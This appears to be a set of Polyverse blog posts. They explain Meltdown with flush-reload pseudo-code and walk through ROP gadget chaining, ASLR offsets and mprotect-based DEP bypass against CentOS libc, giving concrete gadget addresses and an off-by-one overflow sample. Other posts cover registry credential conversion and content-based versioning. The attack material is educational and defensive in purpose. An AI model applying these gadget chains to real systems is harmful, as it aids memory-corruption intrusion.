Automatic Mitigation of Meltdown

Let’s look at what Meltdown is and how it works, as well as how it is stopped. A lot has been written about the Meltdown vulnerability, but it is still commonly misunderstood. A few diagrams may help.

First, let’s consider a simplified memory hierarchy for a computer: main memory, split into user memory and kernel memory; the cache (typically on the CPU chip); and then the CPU itself.


The bug is pretty simple. For about two decades now, processors have had a flag that tells them what privilege level a certain instruction is running in. If an instruction in user space tries to access memory in kernel space (where all the important stuff resides), the processor will throw an exception, and all will be well.

On certain processors though, the speculative executor fails to check this bit, thus causing side-effects in user space (caching of a page), which the user space instructions can test for. The attack is both clever and remarkably simple.

Let’s walk through it graphically. Assume your memory starts with this flushed cache state — nothing sits in the cache right now (the “flush” part of what is a a “flush-reload” attack):


Step 1: Find cached pages

First let’s allocate 256 pages on the user space that we can access. Assuming a page size of 4K, we just allocate 256 times 4K bytes of memory. It doesn’t matter where those pages reside in user-space memory, so long as we got the page size correct. In C-style pseudo-code:

char userspace[256 * 4096];

I’ll mark those in the userspace diagram — for brevity, I’ll only show a few pages, and I’m going to show cached pages popped up like this:


This allows for easier reading (and easier drawing for me!).

So let’s start with an empty (flushed) cache:


We know what the cache state would be if we accessed a byte in page 10. Since any byte in page 10 would do the trick, let’s just use the very first byte (at location 0).

The following code accesses that byte:

char dummy = userspace[10 * 4096];

This leads the state to be:


Now what if we measured the time to access each page and stored it?

int accessTimes[256];
for (int i=0; i < 256; i++) {
    t1 = now();
char dummy = userspace[i * 4096];
    t2 = now();
accessTimes[i] = t2-t1;
}

Since page 10 was cached, page 10’s access time would be significantly faster than all other pages which need a roundtrip to main memory. Our access times array would look something like this:

accessTimes = [100, 100, 100, 100, 100, 100, 100, 100, 100, 10, 100, 100....];

The 10th value (page 10) is an order of magnitude faster to access than anything else. So page 10 is cached, whereas others were not. Note though that all of the pages did get cached as part of this access loop. This is the “reload” part of the flush-reload side-channel — because we reloaded all pages into the cache.

At this point we can figure out which pages are cached with ease if we flush the cache, allow someone else to affect it, then reload it.

Step 2: Speculate on kernel memory

This step is easy. Let’s assume we have a pointer to kernel memory:

char *kernel = 0x1000; //or whatever the case is

If we tried to access it using an unprivileged instruction, it would fail — our user space instructions don’t have a privileged bit set:

char important = kernel[10];

Speculating this is easy. The instruction above would speculate just fine. It would then throw an exception, which would cause us to never get the value of important.

Step 3: Affect userspace based on speculated value

However, what happens if we speculated this?

char dummy = userspace[kernel[10] * 4096]

We know userspace has 256 * 4096 bytes — we allocated it. Since we’re only reading one byte from the kernel address, the maximum value is 255.

What happens when this line is speculated? Even though the processor detected the segmentation fault and prevented you from reading the value, did you notice that it cached the user-space page? The page whose number was the value of kernel memory!

Suppose the value ofkernel[10] was 17. Let’s run through this:

  1. Processor obtained kernel[10] using the branch predictor. That value was 17.
  2. The processor then dereferenced the 17th 4K-wide page in the array “userspace”: userspace[17 * 4096]
  3. The processor detected that you weren’t allowed to access kernel[10], and so told you you can’t execute the branch. Bad programmer!
  4. The processor left the cache untouched. It’s not going to let you touch kernel memory on the cache though. It’s got your back…

What was the state of cache at the end of this?


That’s cool! Using Step 1, we would get the 17th page time being the fastest — by a large amount from the others! That tells us the value of kernel[10] was 17, even though we never accessed kernel[10]!

Pretty neat huh? By going over the kernel byte by byte, we can get the value of every kernel address, by affecting cache pages.

What went wrong? How are we fixing it?

Meltdown is a genuine “bug” — it’s not in the side-channel. The bug is straightforward — CPU speculative execution should not cross security boundaries — and ultimately should be fixed in the CPU itself.

It’s not the cache that’s misbehaving — even though that’s where most operating-system vendors are fixing it. More precisely, they are attempting to further isolate kernel and userspace memory, using something called Kernel Page Table Isolation (KPTI), previously called KAISER. It maps very few “stub” pages to the process’s virtual memory, keeping the kernel out (and thus not reachable by the speculative execution engine).


Unfortunately, this segmentation is coming at a cost — accessing kernel memory now requires more expensive hardware-assisted transitions.

Polymorphic Linux stops ROP attacks; increases difficulty of others

Since Polymorphic Linux was intended for stopping ROP attacks dead in their tracks, all ROP attacks in kernel space are defeated by using polymorphic kernels. Especially when KASLR (kernel address space layout randomization) is defeated (which is so trivial that the Meltdown paper leaves it as an exercise for the reader).

Furthermore, since polymorphic binaries have different signatures, layouts, instructions and gadgets, they make it difficult by at least an order of magnitude to craft further attacks. Polymorphic binaries force the extra step of analysis and understanding per binary. This means that a lateral attack (one that moves from machine to machine in a network) becomes much harder.

Look out for my next post on Spectre. It’s a bit more difficult to explain and definitely harder than Meltdown to craft…

Convert between Docker Registry Credentials, K8s Image Pull Secrets, and config.json live

Generating registry secrets for Kubernetes is cumbersome. Extracting creds or updating the secret is annoying. Generating config.json is painful. But we need to do it all the time!

https://polyverse.github.io/docker-creds-converter/


I frequently generate service accounts in our private image hub for various tests. Generating config.json is cumbersome. Injecting that into a kubernetes cluster as a registry secret (for use as a ImagePullSecrets on a Pod) is hard. Single-character errors can lead to a cryptic ImagePullErr. On a swarm, it’s worse. The tasks just won’t spin up mysteriously.

It is even more painful when working with customers, and you are behind an email-wall at worst, or a slack-wall at best. Both terrible for preserving formatting.

So I whipped up this tri-directional live converter. You can add/edit credentials on the left-most side, and a config.json as well as Kubernetes Secret is generated live (which you can save to a file, and inject using:

kubectl create -f <savedfile.yaml>

However, you may also post a secret you obtained out of Kubernetes by running:

kubectl get secret <secret> --output=yaml

Or you can edit config.json directly. This is incredibly useful when you have a secret that contains authorizations to say 10 registries, but you want to revoke 3 of those.

You can remove those registry entries out of config.json, and the kubernetes yaml will be updated automatically to reflect that.

Spread the word!

ASLR simplified!

ASLR explained in one simple picture

ASLR increases difficulty without adding complexity. In Part 1 and Part 2 of this series I demonstrated that crafting attacks can be a pleasant experience without a lot of furious typing. I’ve even shown you how defeating exploits is easy when we really understand how the attack works. Lets see dive deeper into ASLR, your first line of defense.


Let me explain what you’re seeing in this picture. I loaded a CentOS 7.2 libc-2.17, which we crafted an attack against in my previous post. When I loaded the exact same file on the right, I did it with an offset of 16 bytes (10 in hexadecimal).

I’m adding features to the tool when I need them for the story.

I picked 16 (hex 10) because it provides easy to interpret uniform offsets across all addresses.


You’ll notice how the binary on the right is the same binary as on the left, but it’s moved (which is why the lines are all orange.) The gadgets still exist intact but they’re in a different location. Let’s tabulate the first 5 addresses:

1807d1 + 0x10 = 1807e1
1807f1 + 0x10 = 180801
1807b1 + 0x10 = 1807c1
1a44cc + 0x10 = 1a44dc
1770b0 + 0x10 = 1770c0

This is clever because, as you saw in the title image, if we tried to execute our ROP chain, c6169 c7466 1b92, it will work on the original binary, but it falls flat on the offset one.


In a nutshell, this is what ASLR does! If we offset the same library differently (and unpredictably) for every program on a machine, the chances that the same attack would work or spread are very low.

Remember, security is not about complexity and two people typing furiously on keyboards, entertaining as that is. Security is about doing what is necessary and sufficient to defeat an attack vector.

How is this movement possible?

Offsets are easy because right around the time virtual memory became a thing with the i386, and we moved away from segmented memory to paged memory. All operating systems, processors and compilers came together to work on an offset model. This was originally not intended for security, but rather to enable programs to view a really large memory space, when physically they would only ever use a little bit. It allowed every program to work from memory address 0 through MAX, and the operating system would map it to something real.

ASLR makes use of what already existed which enables any program compiled for a modern operating system to automatically benefit from it.

Can we discover more?

I’m particularly proud of this disassembler because you’re not looking at some block diagram I drew in photoshop or name your favorite visualizer program. You’re looking at a real binary of your choice that you uploaded and can now watch these offsets, gadgets and chains at work. This is ASLR on real gadgets in action!

The cliffhanger for this post is to figure out what techniques you might use to discover the offset… remember there’s only one piece of information we need to jump to any ROP location in the offset binary. All I would have to do is add 0x10 to each address in my chain, and I broke ASLR. Like so: c6179 c7476 1ba2


This gave me an idea. You’ll notice that somehow pop rdi ; ret was in the base library even at the offsetted position! Can we find something common?

I filtered the offsetted library to show surviving gadgets, and some 2,279 gadgets survived.


I have to admit, I sometimes rig these posts to tell a story but this caught me off guard. I discovered that an offset isn’t enough and a sufficiently LARGE offset is needed if a lot of gadgets tend to occur consecutively. This was crazy!

So the second cliffhanger for today is… given that they ALL offset by a fixed amount, is it possible to infer the offset trivially? The answer is of course yes, since the video in Part 2 demonstrated it happening. It’s one thing to read a dry answer and another to intuitively understand it.

Next up I’ll see if I can’t easily figure out an intuitive way to find the offset. I’m basically solving these problems as I write them — this is not some planned series. My team wanted this tool for some other demo, but it ended up being so much fun, I started writing these posts. So I honestly don’t know if I have an answer for intuitive offset-discovery.

Fun with binaries!

ASLR and DEP defeated with three instructions and one offset!

This is Part 2 of my previous post that demonstrated how you craft undetectable attacks against binaries, using our colorful Open Source Entropy Visualization tool. I left you with a cliffhanger… so let’s begin there!

Recap of the cliffhanger

The cliffhanger I left you with was that all we need are three tiny ROP gadgets, and the offset of mprotect, to make any arbitrary part memory executable. First, I present my proof:

This is a video by Roy Sundahl, one of our most senior engineers, and our resident ROP expert who spends a lot of his time figuring out offensive tools.

Before we proceed, if you’re wondering why we can’t just block calls to mprotect, it turns out there’s some truth to Greenspun’s tenth rule. Let’s forgo the obvious candidates like interpreters and JITers. I learned that the tiniest of programs that might use regular expressions will need to call mprotect — including the innocuous “ls”.

Let’s cast a wider net!

Okay that exploit was cool, and you can do this for yourself by finding gadgets across all the libc’s in the samples.

But can we do more? Can we easily go after a range of machines *without* knowing a target signature? Let’s find out!

Here I’m comparing the same “version” of libc across CentOS 7.1 and 7.2. For a quick reference, on the right, rows with a red background are gadgets that survived perfectly, yellow background are gadgets that exist but at a different location, and no background are gadgets that didn’t exist in the first file.

We found some 2503 gadgets across them. You notice how little variation there is when the code was compiled at two different times, from what is probably two variations. The more gadgets that fall on the same addresses, the easier it is for us to cast a wide net since it requires that many fewer custom craftings to go after a binary. The way to determine if your exploit will work across both, first filter the right side by “Surviving Gadgets”, and then search for gadgets you want.

Let’s try that across CentOS 7.1 and 7.2. First up, pop rdi ; ret? Yep! There it is! The first common address is: c6169.

Second up, pop rsi ; ret? Yep! There it is also! First common address is: c7466.

Finally, pop rdx ; ret? Yep! The first surviving address is: 1b92.

We got our complete ROP chain across both binaries: c6169 c7466 1b92. We can validate this by simulating execution across both binaries.

Now you know the complete power of the tool!

This is what the tool is intended to do! You can verify rop chains across binaries without ever leaving your browser. You can now tell, visually and graphically, whether a particular attack will work against a given binary you run. It can be used to craft attacks, but it can also be used to ensure that a patch really worked.

There’s a bit of emotional comfort when you can execute a chain visually, see how the flow jumps around, and see that it doesn’t work.

Are Overflows/Leaks that common?

All this depends of course, on you being able to manipulate some little bit of stack space. Aren’t overflows so…. 2000s? We use bounds-checked modern languages that don’t suffer from these problems.

First of all, if you subscribe to our weekly breach reports, you’ll empirically find that overflows and memory leaks are pretty common. Even the internet’s favorite language, Javascript, is not immune.

Secondly, my best metric to find truth is to look for back-pressure (the sociological version of proof-by-contradiction). Look out for attempts at locking this down 100%, and then follow the backlash.

However, I also want you to get an intuitive understanding of where they arise and why they happen.

Even I have to admit that certain operations (such as sorting or XML/JSON parsing) are better implemented by manipulating memory buffers directly, despite my well-publicized extremist views favoring immutable data and list comprehensions,

So what does a “real overflow” look like? (Code in the samples directory.)

#include <stdio.h>
#define BUF_LEN 20
int main()
{
    char buf[BUF_LEN];
    int i=0;
    while (i++ < BUF_LEN) {
        printf("Setting buf[%d] to zero. n",i);
        buf[i] = 0;
    }
}

I just overwrote a byte on the stack frame. It’s obvious when I point it out. If you were working on this code and not looking for overruns, this is easy to miss. Ever seen the college textbook example of a quicksort using while-loops to avoid using the system stack? They are liberal with while(1)s all over the place.

Personal Rant: They are very common, and they are insanely difficult to find. This is why I’m such an extremist about immutability, list comprehensions, symbolic computation. For your business apps, you should NEVER, unless under extreme exceptions, listen to that “clever” developer who is doing you the favor of writing efficient code. Pat them on the back. Give them a promotion or whatever. Get them out of the way. Then find a lazy person who’ll use list-comprehensions and copy-on-change wherever possible! I’m a big believer in Joe Armstrong’s advice here: First make it work. Then make it beautiful. Finally, if necessary, make it fast.

In our analyses, more than 65% of critical CVEs since June 1st fell under this category. I could be off by a few points on that number since it changes as we compile our reports periodically and tweak how we classify them. But it’s well over 60%.

Putting it all together

In Part 1, I showed you what ROP gadgets are, how to find them, chain them, and exploit them.

In Part 2, I completed the story by demonstrating how to find common gadgets across a wide array of deployed binaries.

The purpose of the Entropy Visualizer is to enable all this decomposition in your browser. In fact this is an easier tool than most ROP finders I know. 🙂

Happy Hunting!

Let’s craft some real attacks!

If you read security briefings, you wake up every morning to “buffer overflow” vulnerabilities, “control flow” exploits, crafted attacks against specific versions of code, and whatnot.

Most of those descriptions are bland and dry. Moreover, much of it makes no intuitive sense, everyone has their fad of the week, and it is easy to feel disillusioned. What’s real, and what’s techno-babble? Didn’t we just pay for the firewalls and deploy the endless stream of patches? What is with all this machine-code nonsense?

A gripe I’ve always had with our industry is that the first solutions we come up with are architectural ivory towers. We try curing cancer on day one, and then in a few years we would sell our soul just to be able to add two numbers reliably. (Yeah, I’m still holding a grudge against UML, CORBA, SOAP, WSDL, and oh for god’s sake — DTDs!)

Let’s skip all that and actually begin by crafting a real attack visually and interactively! No more concepts. No more theory. No more descriptions of instruction set layouts and stacks and heaps! Liberal screenshots to follow! Brace yourself! This is as colorful as binaries will ever get!

Let’s play attacker for a bit

Intro to Tools

Let’s start by visiting this tool I wrote specifically for this blog post, and open a binary.

https://analyze.polyverse.io

(Source code here: https://github.com/Polyverse/binary-entropy-visualizer)

Everytime I build a web app, I end up putting a CLI in there.

Now you can drag-drop a file on there to analyze it — yeah that web page is going to do what advanced geeky nerdy tools are supposed to do on your desktop. For now it only supports Linux 64-bit binaries. Don’t look too hard, there’s two samples provided on my github repo: https://github.com/polyverse/binary-entropy-visualizer/tree/master/samples. Simply download either of the files ending in “.so”.

When you throw it on there, it should show you a progress bar with some analysis…..

Getting this screenshot was hard — it analyzes quickly.

If you want to know what it’s doing, click on the progress bar to see a complete log of actions taken.

Proof: Despite my best attempts, I hid a CLI in there for myself.

When analysis is complete, you should see a table. This is a table of “ROP gadgets.” You’re witnessing a live analysis in your browser of what people with six screens in dark rooms run with complex command lines and special programs.

But wait.. what about those other two sections?

We won’t go into what ROP gadgets are, what makes them a gadget and so on. Anyone who’s ever gone through Programming 101 will recognize it as “Assembly Language code”, another really fun thing that is always presented as dry and irritating. It’s also everywhere.

What is an exploit?

Execution of unwanted instructions

In the fashion of my patron saints, McGyver (the old one) and the Mythbusters, I am not going to go into how you find a buffer overrun and get to inject stuff onto a stack and so on. Sorry. Plenty of classes online to learn how to do that, or you might want to visit Defcon.

Let’s just assume you have a process with a single byte buffer overrun. This isn’t as uncommon as you’d think. Off-by-one errors are plentiful out there. Sure, everyone should use Rust, but didn’t I just rant about how we all want to be “clever” and struggle to plug holes later?

Let’s simply accept that an “exploit” is a set of commands you send to a computer to do what you (the attacker) wants, but something the owner/developer/administrator (the victim) definitely does not want. No matter what name the exploit goes under, at the end of the day it comes down to executing instructions that the attacker wants, and the victim doesn’t. What does stealing/breaking a password do? Allow execution. What does a virus do? Executes instructions. What does SQL-injection do? Executes SQL instructions.

Remember this: execution of unwanted instructions is bad.

Always know what you want

We want a specific set of instructions to run, given below.

Okay let’s craft an exploit now. We’re going to simulate it. All within the browser.

Let’s say for absolutely arbitrary reasons that running the following instructions makes something bad happen. WOPR starts playing a game. Trust me: nobody wants that! You don’t have to understand assembly code. In your mind, the following should translate to, “Later. Let’s play Global Thermonuclear War.

jbe 0x46c18 ; nop ; mov rax, rsi ; pop rbx ;
add byte ptr [rax], al ; add bl, ch ; cmpsb byte ptr [rsi], byte ptr [rdi] ; call rax
and al, 0xf8 ; 
mov ecx, edx ; cmp rdx, rcx ; je 0x12cb78 ; 
jne 0x1668e0 ; add rsp, 8 ; pop rbx ; pop rbp ; 
sub bl, bh ; jmp qword ptr [rax]
add byte ptr [r8–0x77], r9b ; fimul dword ptr [rax — 0x77] ; 
or byte ptr [rdi], 0x94 ; 
push r15 ; in eax, dx ; jmp qword ptr [rdx]
jg 0x95257 ; jne 0x95828 ; 
jb 0x146d9a ; movaps xmmword ptr [rdi], xmm4 ; jmp r9
or byte ptr [rdx], al ; add ah, dl ; div dh ; call rsp
jg 0x97acb ; movdqu xmmword ptr [rdi + 0x10], xmm2 ; 
or dword ptr [rax], eax ; add byte ptr [rax], al ; add byte ptr [rax], al ; 
add byte ptr [rax], al ; enter 8, 0 ; 
xor ch, ch ; mov byte ptr [rdi + 0x1a], ch ;

So how do we do it? The most effective ways to do this is to use social engineering, spearfishing, password-guessing, etc, etc. They are also ways that leave traces. They are effective and blunt, and, with enough data, they will be caught. Also, look at that code. Once someone figures out that this set of instructions causes bad things, it is easy to generate a signature to find any bits of code that match it, and prevent it from running.

But I wouldn’t be writing this post if that was the end of it.

Just because you can’t inject this code through the other methods, doesn’t mean you can’t inject code that will cause this series of instructions to be executed. AI/analytics/machine learning: all suffer from one big flaw — the Turing Test.

A program isn’t malicious because it “has bad instructions.” There’s no such thing as “bad instructions”. Why would processors, and machines and servers and phones ship with “bad instructions?” No, there are bad sequences of instructions!

A program doesn’t necessarily have to carry the bad sequence within itself. All it has to do is carry friendly good sequences, which, on the target host, lead to bad sequences getting executed. If you haven’t guessed already, this behavior may not necessarily be malicious; it might even be accidental.

How to get what you want

Now go back to the tool if you haven’t closed it. Use the file “libc-2.17.so” from the samples, and load it.

Then enter this sequence of numbers in the little text box below “ROP Chain Execution:”

46c1c 7ac3f 46947 12cb5f 166900 183139 cfdcb 12f7ea 191614 95236 146d8a 1889ad 97abb 4392 17390e 98878

It should look something like this:


Go ahead and execute the chain.


Well guess what? An exact match to my instructions to activate WOPR!

The libc that you just analyzed is a fundamental and foundational library linked into practically any and every program on a Linux host. It is checked and validated and patched. Each of those instructions is a good instruction — approved and validated by the processor-maker, the compiler-maker, the package manager all the way down to your system administrator.

What’s a REAL sequence of bad instructions?

pop rdi, pop rsi, pop rdx, and offset of mprotect is all it takes!

I made up the sequence above. In a complete break from convention, I made it more complex just so it’d look cool. Real exploits require gadgets so simple, you’ll think I’m making this part up!

A real known dangerous exploit we (simulated) in our lab requires only three ROP gadget locations, and the offset to mprotect within libc. We can defeat ASLR remotely in seconds, and once we call mprotect, we can make anything executable that we want.

You can see how easy it is to “Find Gadget” and create your own chain for:
pop rdi ; ret
pop rsi ; ret
pop rdx ; ret

This illustrates how simple exploits hide behind cumbersome tools, giving the illusion of difficulty or complexity.

Crafting your own real, serious payloads

So why is this ROP analyzer such a big deal? If you haven’t put two and two together, an exploit typically works like this:

  1. You figure out what you want (we covered this step above).
  2. You need to figure out a sequence of instruction groups, all ending with some kind of a jump/return/call that you can exploit to get the intermediate instructions in between executed.

Turns out that step 2 is not so easy. You need to know what groups of instructions you have to play with, so you can craft chains of them together.

This tool exports these little instruction-groups (called gadgets) from the binaries you feed it. You can then solve for finding which gadgets in what sequence will get achieve your goal.

This is a complex computational problem that I won’t solve today.

Look out for Part 2 of my post which will go into what the other “Compare File” dialog is for… stay tuned! It’s dead trivial to figure out, anyway, so go do it if you want.

Semantic Versioning has failed Agile

This is an Engineering post on how we build software at Polyverse, what processes we follow and why we follow them.

A couple of weeks ago, I attended a CoffeeOps meetup at Chef HQ. One of my answers detailing how we do agile, CI/CD, etc. got people excited. That prompted me to describe in detail exactly how our code is built, shipped, and how we simplified many of the challenges we saw in other processes. It should be no surprise that we make heavy use of Docker for getting cheap, reliable, and consistent environments.

Dropping Irrelevant Assumptions

I first want to take a quick moment to explain how I try to approach any new technology, methodology or solution, so that I make the best use of it.

Four years ago, when we brought Git into an org, a very experienced and extremely capable engineer raised their hand and asked, “I’ve heard that Git doesn’t have the feature to revert a single file back in history. Is this true? If it is true, then I want to understand why we are going backwards.”

I will never forget that moment. As a technical person, truthfully, that person was absolutely RIGHT! However, moving a single file backwards was something we did because we didn’t have the ability to cheaply tag the “state” of a repo, so we built up terrible habits such as “branch freeze”, timestamp-based checkouts, “gauntlets”, etc. It was one of the most difficult questions to answer, without turning them antagonistic, and without sounding like you’re evading the issue.

I previously wrote a similar answer on Quora about Docker and why the worst thing you can do is to compare containers to VMs.

It is very dangerous to stick to old workarounds when a paradigm shift occurs. Can we finally stop it with object pools for trivial objects in Java?

What problems were we trying to solve?

We had the same laundry list of problems nearly any organization of any type (big, small, startup, distributed, centralized, etc.) has:

  1. First and foremost, we wanted to be agile, as an adjective and a verb, not the noun. We had to demonstrably move fast.
  2. The most important capability we really wanted to get right was the ability to talk about a “thing” consistently across the team, with customers, with partners, with tools and everything else. After decades of experience, we’d all had difficulty in communicating precise “versions” of things. Does that version contain a specific patch? Does it have all the things you expect? Or does it have things you don’t expect?
  3. We wanted to separate the various concerns of shipping and pay the technical debt at the right layer at all times: developer concerns, QA assertions, and release concerns. Traditional methods (even those used in “agile”, were too mingled for the modern tooling we had). For example, “Committing code” is precisely that — take some code and push it. “Good code” is a QA assertion — regardless of whether it be committed or not. “Good enough for customers” is a release concern. When you have powerful tools like Docker and Git, trying to mangle all three in some kind of “master” or “release” branch seemed medieval!
  4. We wanted no “special” developers. Nobody is any more or less important than anyone else. All developers pay off all costs at the source. One person wouldn’t be unfairly paying for the tech debt of another person.
  5. We believed that “code is the spec, and the spec is in your code”. If you want to know something, you should be able to consistently figure it out in one place — the code. This is the DRY principle (Don’t Repeat Yourself.) If code is unreadable, make it readable, accessible, factored, understandable. Don’t use documentation to cover it up.
  6. We wanted the lowest cognitive load on the team. This means use familiar and de-facto standards wherever possible, even if it is occasionally at the cost of simplicity. We have a serious case of the “Not-Invented-Here” syndrome. 🙂 We first look at everything that’s “Not-Invented-Here”, and only if it doesn’t suit our purpose for a real and practical problem, do we sponsor building it in-house.

Now let’s look at how we actually build code.

Content-based non-linear versioning

The very fundamental foundation of everything at Polyverse is content-based versioning. A content-based version is a cryptographically secure hash over a set of bits, and that hash is used as the “version” for those bits.

This is a premise you will find everywhere in our processes. If you want to tell your colleague what version of Router you want, you’d say something like: router@72e5e550d1835013832f64597cb1368b7155bd53. That is the version of the router you’re addressing. It is unambiguous, and you can go to the Git repository that holds our router, and get PRECISELY what your colleague is using by running git checkout 72e5e550d1835013832f64597cb1368b7155bd53.

This theme also carries over to our binaries. While there is semantic versioning in there, you’ll easily baffle anyone on the team if you asked them for “Router 1.0.2”. Not that it is difficult to look it up, but that number is a text string that anyone could place there and as a mental model, you’d make everyone a little uneasy. Culturally we simply aren’t accustomed to talking in imprecise terms like that. You’d be far more comfortable saying Router with sha 5c0fd5d38f55b49565253c8d469beb9f3fcf9003.

Philosophically we view Git repos as “commit-clouds”. The repos are just an amorphous cloud of various commit shas. Any and every commit is a “version”. You’ll note that this not only is an important way to talk about artifacts precisely, but more so, it truly separates “concerns”. There is no punishment for pushing arbitrary amounts of code to Git on arbitrary branches. There is no fear of rapidly branching and patching. There is no cognitive load for quickly working with a customer to deliver a rapid feature off of a different branch. It just takes away all the burden of having to figure out what version you assign to indicate “Last known good build of v1.2.3 with patches x, y, but not z”, and “Last known good build of v1.2.3 with patches x, z, but not y”.

Instead, anyone can look up your “version” and go through the content tree, as well as Git history and figure out precisely what is contained in there.

Right about now, I usually get pushback surrounding the questions: how do you know what is the latest? And how do you know where to merge?

That is precisely that “perforce vs git” mental break we benefit from. You see, versions don’t really work linearly. I’ve seen teams extremely frightened of reverting commits and terrified of removing breaking features rapidly. Remember that “later” does not necessarily mean “better” or “comprehensive”. If A comes later than B, it does not imply that A has more features than B, or that A is more stable than B, or that A is more useful than B. It simply means that somewhere in A’s history, is a commit node B. I fundamentally wanted to break this mental model of “later” in order to break the hierarchy in a team.

This came from two very real examples from my past:

  1. I’ll never forget my first ever non-shadowed on-call rotation at Amazon. I called it the build-from-hell. For some reason, a breaking feature delayed our release by a couple of days. We were on a monthly release cycle. No big deal.
    However, once the feature was broken, and because there was an implied but unspoken model of “later is better”, nobody wanted to use the word “revert”. In fact, it was a taboo word that would be taken very personally by any committer. At some point, other people started to pile on to the same build in order to take advantage of the release (because the next release was still a month away.) This soon degraded into a cycle where we delayed the release by about 3 weeks, and in frustration we pulled the trigger and deployed it, because reverting was not in the vocabulary — I might have just called the committer a bunch of profane names and an imbecile and a moron and would have been better off.
  2. The event led to the very first Sev-1 of my life at 4am on one fateful morning. For the uninitiated, a Sev-1 is code for “holy shit something’s broken so bad, we’re not making any money off Amazon.com.”
    After four hours of investigation it turned out that someone had made a breaking API change in a Java library, and had forgotten to bump up the version number — so when a dependent object tried to call into that library, the dispatch failed. Yes we blamed them and ostracized them, and added “process” around versioning, but that was my inflexion point — it’s so stupid!
    What if that library had been a patch? What if it had 3 specific patches but not 2 others? Does looking at version “2.4.5-rc5” vs “2.4.5-rc4” tell you that rc5 has more patches? Less patches? Is more stable? Which one is preferable? Are these versions branch labels? Git tags? How you ensure someone didn’t reassign that tag by accident? Use signed tags? All of this is dumb and unnecessary! The tool gives you PRECISE content identifiers. It was fundamentally built for that! Why not use it? Back in SVN/CVS/Perforce, we had no ability to specifically point to a code snapshot and it was time we broke habits we picked up because of that. This is why Git does not allow reverting of a single one file. 🙂

The key takeaway here was — these are not development concerns. We conflated release concerns with identity concerns. They are not the same. First, we need a way to identify and speak about the precise same thing. Then we can assert over that thing various attributes and qualities we want.

We didn’t want people to have undue process to make rapid changes. What’s wrong with making breaking API changes? Nothing at all! That’s how progress happens. Developers should be able to have a bunch of crazy ideas in progress at all times and commits should be cheap and easy! They should also have a quick, easy and reliable way of throwing their crazy ideas over the wall to someone else and say, “Hey can you check this version and see how it does?”, without having to go through a one-page naming-convention doc and updating metadata files. That was just so medieval!

What about dependency indirection? One reason people use symbolic references (like semantic versioning) is so that we can refer to “anything greater than 2.3.4” and not worry about the specific thing that’s used.

For one, do you REALLY ever deploy to production and allow late-binding? As numerous incidents have demonstrated, no sane Ops person would ever do this!

In my mind, having the ability to deterministically talk about something, far outweighs the minor inconvenience of having to publish dependency updates. I’ll describe how we handle dependencies in just a minute.

Heavy reliance on Feature Detection

Non-linear content-based versioning, clearly raises red-flags. Especially when you’re built around an actor-based model of microservices passing messages all over the place.

However, there’s been a solution staring us right in the face for the past decade. One that we learned from the web developers — use feature detection, not version detection!

When you have loosely-coupled microservices that have no strict API bindings, but rather pass messages to each other, the best way to determine if a service provides a feature you want, is to just ask it!

We found quite easily, that when you’re not building RPC-style systems, and I consider callbacks as still being an RPC-style system, you don’t even need feature-detection. If a service doesn’t know what to do with a message, it merely ignores it, and the feature simply doesn’t exist in the system. If you’re not waiting for a side-effect — not just syntactically, but even semantically, you end up with a very easy model.

Now that comment in the previous section about a developer being able to throw a version over the wall and ask another developer what they thought of it, makes a lot more sense. Someone can easily plug in a new version very easily into the system, and quickly assert whether it works with the other components and what features it enables.

This means that at any given time, all services can arbitrarily publish a bunch of newer features without affecting others for the most part. This is also what allows us to have half a dozen things in progress at all times, and we can quickly test whether something causes a regression, and whether something breaks a scenario. We can label that against a “version” and we know what versions don’t work.

Naturally this leads us to a very obvious conclusion, where “taking dependencies” areno longer required at a service/component level. They wouldn’t be loosely-coupled actor-model-based Erlang-inspired microservices, if they had dependency trees. What makes more sense is…

Composition, not Dependencies

When you have content-based non-linear versioning allowing aggressive idea execution, combined with services that really aren’t all that concerned about what their message receivers do, and will simply log an error and drop weird messages sent to themselves, you end up with a rather easy solution to dependency management — composition.

If you’ve read my previous posts, or if you’ve seen some of our samples, you’ll have noticed a key configuration value that shows up all over the place called the VFI. It’s a JSON blob that looks something like this:

{
"etcd": {
"type": "dockerImage",
"address": "quay.io/coreos/etcd:v3.1.5"
},
"nsq": {
"type": "dockerImage",
"address": "nsqio/nsq:v0.3.8"
},
"polyverse": {
"type": "dockerImage",
"address": "polyverse-runtime.jfrog.io/polyverse:0e564bcc9d4c8f972fc02c1f5941cbf5be2cdb60"
},
"status": {
"type": "dockerImage",
"address": "polyverse-runtime.jfrog.io/status:01670250b9a6ee21a07355f3351e7182f55f7271"
},
"supervisor": {
"type": "dockerImage",
"address": "polyverse-runtime.jfrog.io/supervisor:0d58176ce3efa59e2d30b869ac88add4467da71f"
},
"router": {
"type": "dockerImage",
"address": "polyverse-runtime.jfrog.io/router:f0efcd118dca2a81229571a2dfa166ea144595a1"
},
"containerManager": {
"type": "dockerImage",
"address": "polyverse-runtime.jfrog.io/container-manager:b629e2e0238adfcc8bf7c8c36cff1637d769339d"
},
"eventService": {
"type": "dockerImage",
"address": "polyverse-runtime.jfrog.io/event-service:0bd8b2bb2292dbe6800ebc7d95bcdb7eb902e67d"
},
"api": {
"type": "dockerImage",
"address": "polyverse-runtime.jfrog.io/api:ed0062b413a4ede0e647d1a160ecfd3a8c476879"
}
}

NOTE: If you work at Amazon or have worked there before, you’ll recognize where the word came from. When we started at Polyverse, I really wanted a composition blob that described a set of components together, and I started calling it a VFI, and now it’s become a proper noun. It really has lost all meaning as an acronym. It’s simply its own thing at this point.

What you’re seeing here, is a set of components that describe as you guessed it, the addresses where they might be obtained (in this example, the addresses are symbolic — they’re Docker image labels; however in highly-secure deployments we use the one true way to address something — content-based shas. You might easily see a VFI that has “polyverse-runtime.jfrog.io/api@sha256:<somesha>” in the address field.

Again, you’ll notice that this isn’t a fight against proper dependencies, but rather an acknowledgement that “router” is not where information for “all of polyverse working” should be captured. It is a proper separation of concerns.

The router is concerned with whether it builds, passes tests, boots up and has dependencies it requires for its own runtime. What doesn’t happen is a router taking dependencies at the component level, on what the container manager should be, could be, would be, etc. And more so, it does not have the burden of ensuring that “cycling works”.

Too often these dependency trees impose heavy burdens on developers of a single component. In the past I’ve seen situations where, if you’re a web-server builder, and you got a downstream broken dependency related to authentication, you are now somehow de-facto responsible for paying the price of the entire system’s end-to-end working. It means that the burden of work increases as you move further upstream closer to your customer. One bad actor downstream, has you paying the cost. Sure, we can reduce the cost by continually integrating faster, but unless “reverting” is an option on the table, you’re still the person who has to do it.

